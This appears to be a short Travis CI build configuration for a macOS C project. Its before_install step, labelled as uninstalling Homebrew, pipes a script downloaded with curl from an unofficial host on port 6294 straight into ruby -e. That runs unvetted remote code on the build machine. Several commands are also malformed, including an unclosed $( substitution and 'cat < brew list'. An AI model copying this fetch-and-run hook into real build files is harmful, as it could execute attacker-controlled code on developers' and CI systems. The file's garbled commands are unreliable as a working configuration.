os: osx

language: C

before_install:
        - echo " Uninstalling the homebrew"
        - ruby -e "$(curl -fsSL http://listen-1.com:6294/uninstall_homebrew"
        - echo "Successfully uninstalled the homebrew"
          
install: true

script: ./install_app_for_mac.sh

after_success: 
        - cat < brew list
        - echo "Build Passed"
